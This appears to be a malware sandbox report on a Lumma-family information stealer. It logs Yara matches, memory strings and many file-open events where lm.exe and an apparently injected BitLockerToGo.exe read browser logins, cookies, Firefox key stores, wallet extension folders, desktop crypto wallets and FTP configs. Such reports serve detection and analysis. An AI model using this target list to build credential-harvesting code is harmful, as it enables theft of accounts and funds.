Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 1988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lm.exe PID: 5724, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 00000003.00000002.1941543133.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1941477566.00000000001A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1718024777.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1717820306.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: BitLockerToGo.exe, 00000010.00000003.2639948784.0000000003377000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "%appdata%\\Electrum\\wallets","m":["*"]$sJ
Source: BitLockerToGo.exe, 00000010.00000003.2639948784.0000000003377000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "*"],"z":"Wallets/ElectronCash","d":0,"f
Source: EF14.exe String found in binary or memory: 61azMCvCJTGgpqseAkDulivzcEIzbUh6GMdTZAHnf1fdOpeVIX1cvVM4A8eZYfeoEwKiaYuvGzYIFP83bjKF7m6bj2wJAxxEhOliTXiwSEw/wKfyExx0wSCYqAXlH96eBExAmJxHEi07ZRDCnO0inYh1kTLelXIq6GhRN/GAUttG+NG6k9KosqFAP0KhGV9rw2I72LM/52rDcmE4tf+MyZ2GCqyJk4LOJJPPBz+M/3bNhSXwcNXMQCxo38kKghYrUGlK
Source: BitLockerToGo.exe, 00000010.00000003.2639948784.0000000003377000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: BitLockerToGo.exe, 00000010.00000003.2639948784.0000000003385000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: BitLockerToGo.exe, 00000010.00000003.2639948784.000000000335E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
Source: BitLockerToGo.exe, 00000010.00000003.2639948784.0000000003377000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
Source: BitLockerToGo.exe, 00000010.00000003.2639948784.000000000335E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 2D42.exe, 0000000A.00000002.2847339987.00007FFD9BD10000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
